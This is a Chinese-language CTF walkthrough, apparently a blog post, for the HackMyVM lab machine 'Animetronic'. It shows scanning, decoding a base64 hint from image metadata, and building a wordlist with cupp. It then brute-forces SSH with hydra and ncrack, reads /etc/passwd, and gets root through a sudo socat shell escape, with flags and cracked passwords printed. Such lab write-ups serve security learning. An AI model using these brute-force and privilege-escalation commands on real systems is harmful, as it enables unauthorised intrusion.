{"id":496,"date":"2024-04-03T19:53:38","date_gmt":"2024-04-03T11:53:38","guid":{"rendered":"http:\/\/162.14.82.114\/?p=496"},"modified":"2024-04-03T19:53:38","modified_gmt":"2024-04-03T11:53:38","slug":"hmv-_-animetronic","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/496\/04\/03\/2024\/","title":{"rendered":"hmv[-_-] Animetronic"},"content":{"rendered":"<h1>Animetronic<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947772.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947772.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403151754014\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nmap -sCV 172.20.10.5<\/code><\/pre>\n<pre><code class=\"language-text\">PORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 59:eb:51:67:e5:6a:9e:c1:4c:4e:c5:da:cd:ab:4c:eb (ECDSA)\n|_  256 96:da:61:17:e2:23:ca:70:19:b5:3f:53:b5:5a:02:59 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))\n|_http-title: Animetronic\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u7206\u7834<\/h3>\n<pre><code class=\"language-bash\">feroxbuster -u http:\/\/172.20.10.5<\/code><\/pre>\n<pre><code class=\"language-css\">301      GET  
      9l       28w      307c http:\/\/172.20.10.5\/js =&gt; http:\/\/172.20.10.5\/js\/\n200      GET       52l      340w    24172c http:\/\/172.20.10.5\/img\/favicon.ico\n200      GET       42l       81w      781c http:\/\/172.20.10.5\/css\/animetronic.css\n200      GET        7l     1513w   144878c http:\/\/172.20.10.5\/css\/bootstrap.min.css\n301      GET        9l       28w      308c http:\/\/172.20.10.5\/css =&gt; http:\/\/172.20.10.5\/css\/\n301      GET        9l       28w      308c http:\/\/172.20.10.5\/img =&gt; http:\/\/172.20.10.5\/img\/\n200      GET     2761l    15370w  1300870c http:\/\/172.20.10.5\/img\/logo.png\n200      GET       52l      202w     2384c http:\/\/172.20.10.5\/<\/code><\/pre>\n<p>\u4ee5\u9632\u4e07\u4e00\uff0c\u6362\u4e00\u4e2a\u5b57\u5178\u626b\u4e00\u4e0b\uff0c\u8fd9\u4e2a\u9ed8\u8ba4\u5b57\u5178\u6709\u7684\u65f6\u5019\u5f88\u5bb9\u6613\u6f0f\u6389\u4e1c\u897f\uff1a<\/p>\n<pre><code class=\"language-bash\">feroxbuster -u http:\/\/172.20.10.5\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/code><\/pre>\n<p>\u679c\u7136\uff0c\u6f0f\u6389\u4e1c\u897f\u4e86\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-css\">200      GET        7l     1513w   144878c http:\/\/172.20.10.5\/css\/bootstrap.min.css\n200      GET       52l      340w    24172c http:\/\/172.20.10.5\/img\/favicon.ico\n301      GET        9l       28w      308c http:\/\/172.20.10.5\/css =&gt; http:\/\/172.20.10.5\/css\/\n301      GET        9l       28w      307c http:\/\/172.20.10.5\/js =&gt; http:\/\/172.20.10.5\/js\/\n301      GET        9l       28w      308c http:\/\/172.20.10.5\/img =&gt; http:\/\/172.20.10.5\/img\/\n200      GET     2761l    15370w  1300870c http:\/\/172.20.10.5\/img\/logo.png\n200      GET       42l       81w      781c http:\/\/172.20.10.5\/css\/animetronic.css\n200      GET       52l      202w     2384c http:\/\/172.20.10.5\/\n301      GET        9l       28w      315c http:\/\/172.20.10.5\/staffpages =&gt; 
http:\/\/172.20.10.5\/staffpages\/\n200      GET      728l     3824w   287818c http:\/\/172.20.10.5\/staffpages\/new_employees<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u6316\u6398<\/h2>\n<h3>\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947774.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947774.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403152606719\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947775.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947775.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403152619033\" style=\"zoom:33%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.5\/staffpages\/<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947776.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947776.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403152709630\" style=\"zoom:33%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.5\/staffpages\/new_employees<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947777.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947777.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403152753488\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u597d\u5bb6\u4f19\uff0c\u73a9\u5177\u718a\uff0c\u662f\u4e00\u5f20\u56fe\u7247\uff0c\u8bf7\u6c42\u8fc7\u6765\u3002<\/p>\n<h3>\u56fe\u7247\u9690\u5199<\/h3>\n<pre><code class=\"language-bash\">wget http:\/\/172.20.10.5\/staffpages\/new_employees<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Animetronic]\n\u2514\u2500$ steghide extract -sf new_employees  \nEnter passphrase: 
\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Animetronic]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt new_employees \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Progress: 99.74% (133.1 MB)           \n[!] error: Could not find a valid passphrase.<\/code><\/pre>\n<p>\u770b\u8d77\u6765\u53ef\u80fd\u6709\u9690\u85cf\u4fe1\u606f\uff0c\u4f46\u662f\u6211\u4eec\u6ca1\u6709\u7206\u7834\u51fa\u6765\uff08steghide \u4e0d\u7ba1\u6709\u6ca1\u6709\u5d4c\u5165\u6570\u636e\u90fd\u4f1a\u63d0\u793a\u8f93\u5165\u53e3\u4ee4\uff0cstegseek \u6ca1\u8dd1\u51fa\u53e3\u4ee4\u4e5f\u4e0d\u80fd\u8bc1\u660e\u4e00\u5b9a\u6709\u9690\u5199\u6570\u636e\uff09\uff1a<\/p>\n<p>\u5c1d\u8bd5\u76f4\u63a5file\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">file new_employees             \nnew_employees: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: &quot;page for you michael : ya\/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=&quot;, progressive, precision 8, 703x1136, components 3<\/code><\/pre>\n<p>\u627e\u5230\u9690\u85cf\u4fe1\u606f\uff0c\u5f88\u660e\u663e\u662fbase64\uff0c\u89e3\u7801\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">echo &#039;ya\/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=&#039; | base64 -d\n\u026f\u01ddss\u0250\u0183\u01dd\u203e\u025fo\u0279\u203e\u026f\u0131\u0254\u0265\u0250\u01dd<\/code><\/pre>\n<p>\u5012\u8fc7\u6765\u518d\u7ffb\u8f6c\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947778.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947778.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403153704311\" 
style=\"zoom: 33%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">message_for_m1chae<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8bbf\u95ee\u53d1\u73b0\u9519\u8bef\uff0c\u66f4\u6539\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-apl\">message_for_m1chae + page for you michael -&gt; message_for_michael<\/code><\/pre>\n<pre><code class=\"language-text\">Hi Michael\n\nSorry for this complicated way of sending messages between us.\nThis is because I assigned a powerful hacker to try to hack\nour server.\n\nBy the way, try changing your password because it is easy\nto discover, as it is a mixture of your personal information\ncontained in this file \n\npersonal_info.txt<\/code><\/pre>\n<p>\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-text\">name: Michael\nage: 27\nbirth date: 19\/10\/1996\nnumber of children: 3 &quot; Ahmed - Yasser - Adam &quot;\nHobbies: swimming <\/code><\/pre>\n<p>\u751f\u6210\u793e\u5de5\u5b57\u5178\u8fdb\u884c\u7206\u7834\uff0c\u5c1d\u8bd5\u4f7f\u7528cupp\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/cupp]\n\u2514\u2500$ python3 cupp.py -i\n ___________ \n   cupp.py!                 # Common\n      \\                     # User\n       \\   ,__,             # Passwords\n        \\  (oo)____         # Profiler\n           (__)    )\\   \n              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]\n                            [ Mebus | https:\/\/github.com\/Mebus\/]\n\n[+] Insert the information about the victim to make a dictionary\n[+] If you don&#039;t know all the info, just hit enter when asked! 
;)\n\n> First Name: Michael\n> Surname: \n> Nickname: \n> Birthdate (DDMMYYYY): 19101996          \n\n> Partners) name: \n> Partners) nickname: \n> Partners) birthdate (DDMMYYYY): \n\n> Child&#039;s name: Ahmed\n> Child&#039;s nickname: \n> Child&#039;s birthdate (DDMMYYYY): \n\n> Pet&#039;s name: \n> Company name: \n\n> Do you want to add some key words about the victim? Y\/[N]: Y\n> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: 27 Yasser Adam swimming\n> Do you want to add special chars at the end of words? Y\/[N]: Y\n> Do you want to add some random numbers at the end of words? Y\/[N]:Y\n> Leet mode? (i.e. leet = 1337) Y\/[N]: \n\n[+] Now making a dictionary...\n[+] Sorting list and removing duplicates...\n[+] Saving dictionary to michael.txt, counting 3984 words.\n> Hyperspeed Print? (Y\/n) : n\n[+] Now load your pistolero with michael.txt and shoot! Good luck!<\/code><\/pre>\n<p>\u7136\u540e\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-bash\">hydra -l Michael -P michael.txt ssh:\/\/172.20.10.5<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/cupp]\n\u2514\u2500$ hydra -l michael -P michael.txt ssh:\/\/172.20.10.5      \nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-03 06:50:13\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[WARNING] Restorefile (you have 10 seconds to abort... 
(use option -I to skip waiting)) from a previous session found, to prevent overwriting, .\/hydra.restore\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 3984 login tries (l:1\/p:3984), ~249 tries per task\n[DATA] attacking ssh:\/\/172.20.10.5:22\/\n[STATUS] 114.00 tries\/min, 114 tries in 00:01h, 3872 to do in 00:34h, 14 active\n[STATUS] 98.67 tries\/min, 296 tries in 00:03h, 3690 to do in 00:38h, 14 active\n[STATUS] 92.29 tries\/min, 646 tries in 00:07h, 3340 to do in 00:37h, 14 active\n[STATUS] 89.73 tries\/min, 1346 tries in 00:15h, 2640 to do in 00:30h, 14 active\n[STATUS] 86.68 tries\/min, 2687 tries in 00:31h, 1300 to do in 00:15h, 13 active\n[STATUS] 85.89 tries\/min, 3092 tries in 00:36h, 895 to do in 00:11h, 13 active\n[22][ssh] host: 172.20.10.5   login: michael   password: leahcim1996\n1 of 1 target successfully completed, 1 valid password found\n[WARNING] Writing restore file because 3 final worker threads did not complete until end.\n[ERROR] 3 targets did not resolve or could not be connected\n[ERROR] 0 target did not complete\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-04-03 07:30:22<\/code><\/pre>\n<p>\u7206\u7834\u51fa\u6765\u4e86\u4e00\u4e2a\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-apl\">michael\nleahcim1996<\/code><\/pre>\n<h3>ssh\u8fde\u63a5<\/h3>\n<pre><code class=\"language-bash\">ssh michael@172.20.10.5\nleahcim1996<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947779.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947779.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403184234499\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">michael@animetronic:~$ whoami;id\nmichael\nuid=1001(michael) gid=1001(michael) groups=1001(michael)\nmichael@animetronic:~$ sudo -l\n[sudo] password for michael: \nSorry, user michael may not run sudo on animetronic.\nmichael@animetronic:\/home\/henry$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/libexec\/polkit-agent-helper-1\n\/usr\/bin\/newgrp\n\/usr\/bin\/chfn\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/passwd\n\/usr\/bin\/sudo\n\/usr\/bin\/mount\n\/usr\/bin\/pkexec\n\/usr\/bin\/su\n\/usr\/bin\/fusermount3\n\/usr\/bin\/chsh\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\nmichael@animetronic:~$ pwd\n\/home\/michael\nmichael@animetronic:~$ ls -la\ntotal 28\ndrwxr-x--- 3 michael michael 4096 Nov 27 21:03 .\ndrwxr-xr-x 4 root    root    4096 Nov 27 18:10 ..\n-rw------- 1 michael michael    5 Nov 27 21:03 .bash_history\n-rw-r--r-- 1 michael michael  220 Jan  6  2022 .bash_logout\n-rw-r--r-- 1 michael michael 3771 Jan  6  2022 .bashrc\ndrwx------ 2 michael michael 4096 Nov 27 18:50 .cache\n-rw-r--r-- 1 michael michael  807 Jan  6  2022 .profile\nmichael@animetronic:~$ cat .bash_history \nexit\nmichael@animetronic:~$ cd ..;ls -la\ntotal 16\ndrwxr-xr-x  4 root    root    4096 Nov 27 18:10 .\ndrwxr-xr-x 19 root    root    4096 Nov 27 09:54 ..\ndrwxrwxr-x  6 henry   henry   4096 Nov 27 20:59 henry\ndrwxr-x---  3 michael michael 4096 Nov 27 21:03 michael\nmichael@animetronic:\/home$ cd henry\/\nmichael@animetronic:\/home\/henry$ ls -la\ntotal 56\ndrwxrwxr-x   6 henry henry  4096 Nov 27 20:59 .\ndrwxr-xr-x   4 root  root   4096 Nov 27 
18:10 ..\n-rwxrwxr-x   1 henry henry    30 Jan  5 10:08 .bash_history\n-rwxrwxr-x   1 henry henry   220 Jan  6  2022 .bash_logout\n-rwxrwxr-x   1 henry henry  3771 Jan  6  2022 .bashrc\ndrwxrwxr-x   2 henry henry  4096 Nov 27 10:08 .cache\ndrwxrwxr-x   3 henry henry  4096 Nov 27 10:42 .local\ndrwxrwxr-x 402 henry henry 12288 Nov 27 18:23 .new_folder\n-rwxrwxr-x   1 henry henry   807 Jan  6  2022 .profile\ndrwxrwxr-x   2 henry henry  4096 Nov 27 10:04 .ssh\n-rwxrwxr-x   1 henry henry     0 Nov 27 18:26 .sudo_as_admin_successful\n-rwxrwxr-x   1 henry henry   119 Nov 27 18:18 Note.txt\n-rwxrwxr-x   1 henry henry    33 Nov 27 18:20 user.txt\nmichael@animetronic:\/home\/henry$ cat user.txt \n0833990328464efff1de6cd93067cfb7\nmichael@animetronic:\/home\/henry$ cat Note.txt \nif you need my account to do anything on the server,\nyou will find my password in file named\n\naGVucnlwYXNzd29yZC50eHQK<\/code><\/pre>\n<h3>\u627e\u654f\u611f\u6587\u4ef6<\/h3>\n<pre><code class=\"language-bash\">find \/ -name aGVucnlwYXNzd29yZC50eHQK -type f 2&gt;\/dev\/null<\/code><\/pre>\n<p>\u6ca1\u6709\u53d1\u73b0\uff0c\u8fdb\u884cbase64\u89e3\u7801\uff1a<\/p>\n<pre><code class=\"language-bash\">echo &quot;aGVucnlwYXNzd29yZC50eHQK&quot; | base64 -d\nhenrypassword.txt\nfind \/ -name henrypassword.txt -type f 2&gt;\/dev\/null\n\/home\/henry\/.new_folder\/dir289\/dir26\/dir10\/henrypassword.txt<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\u6587\u4ef6\u5185\u5bb9\uff1a<\/p>\n<pre><code class=\"language-apl\">IHateWilliam<\/code><\/pre>\n<h3>\u5207\u6362henry\u7528\u6237<\/h3>\n<p>\u5b83\u7684\u540d\u5b57\u663e\u793a\u8fd9\u662f<code>henry<\/code>\u7684\u5bc6\u7801\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u6709\u8fd9\u4e2a\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-bash\">michael@animetronic:\/home\/henry$ cat 
\/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:104::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:105:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\npollinate:x:105:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nusbmux:x:107:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\nhenry:x:1000:1000:Hanry:\/home\/henry:\/bin\/bash\nmysql:x:108:113:MySQL Server,,,:\/nonexistent:\/bin\/false\nmichael:x:1001:1001::\/home\/michael:\/usr\/bin\/bas<\/code><\/pre>\n<p>\u6709\u7684\uff0c\u5c1d\u8bd5\u5207\u6362\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-bash\">michael@animetronic:\/home\/henry$ su henry\nPassword: \nhenry@animetronic:~$ whoami;id\nhenry\nuid=1000(henry) gid=1000(henry) 
groups=1000(henry),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)<\/code><\/pre>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">henry@animetronic:~$ sudo -l\nMatching Defaults entries for henry on animetronic:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser henry may run the following commands on animetronic:\n    (root) NOPASSWD: \/usr\/bin\/socat<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u63d0\u6743\uff1a<a href=\"https:\/\/gtfobins.github.io\/gtfobins\/socat\/\">https:\/\/gtfobins.github.io\/gtfobins\/socat\/<\/a><\/p>\n<pre><code class=\"language-bash\">sudo socat stdin exec:\/bin\/bash<\/code><\/pre>\n<pre><code class=\"language-bash\">henry@animetronic:~$ sudo socat stdin exec:\/bin\/bash\nwhoami\nroot\nid\nuid=0(root) gid=0(root) groups=0(root)\ncd \/root\nls\nroot.txt\ncat root.txt\n153a1b940365f46ebed28d74f142530f280a2c0a<\/code><\/pre>\n<h2>\u989d\u5916\u6536\u83b7<\/h2>\n<h3>\u56fe\u7247\u9690\u5199<\/h3>\n<p>\u53ef\u4ee5\u4f7f\u7528<\/p>\n<pre><code class=\"language-bash\">exiftool \u6587\u4ef6\u8def\u5f84<\/code><\/pre>\n<p>\u67e5\u770b\u56fe\u7247\u7684\u9690\u85cf\u4fe1\u606f\u3002<\/p>\n<h3>\u7206\u7834<\/h3>\n<p>\u5de8\u9b54\u5e08\u5085\u4f7f\u7528 ncrack \u8fdb\u884c\u7206\u7834\uff0c\u5b66\u4e60\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">ncrack -T5 -v -u michael -P michael.txt ssh:\/\/172.20.10.5<\/code><\/pre>\n<pre><code class=\"language-text\">Starting Ncrack 0.7 ( http:\/\/ncrack.org ) at 2024-04-03 07:04 EDT\nDiscovered credentials on ssh:\/\/172.20.10.5:22 &#039;michael&#039; &#039;leahcim1996&#039;\nDiscovered credentials for ssh on 172.20.10.5 22\/tcp:\n172.20.10.5 22\/tcp ssh: &#039;michael&#039; &#039;leahcim1996&#039;\n\nNcrack done: 1 service scanned in 666.24 seconds.\nProbes sent: 1141 | timed-out: 0 | prematurely-closed: 468\n\nNcrack 
finished.<\/code><\/pre>\n<p>\u786e\u5b9e\u6bd4<code>hydra<\/code>\u5feb\u591a\u4e86<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Animetronic \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf nmap -sCV 172.20.10.5 PORT STATE  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-496","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/496","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/w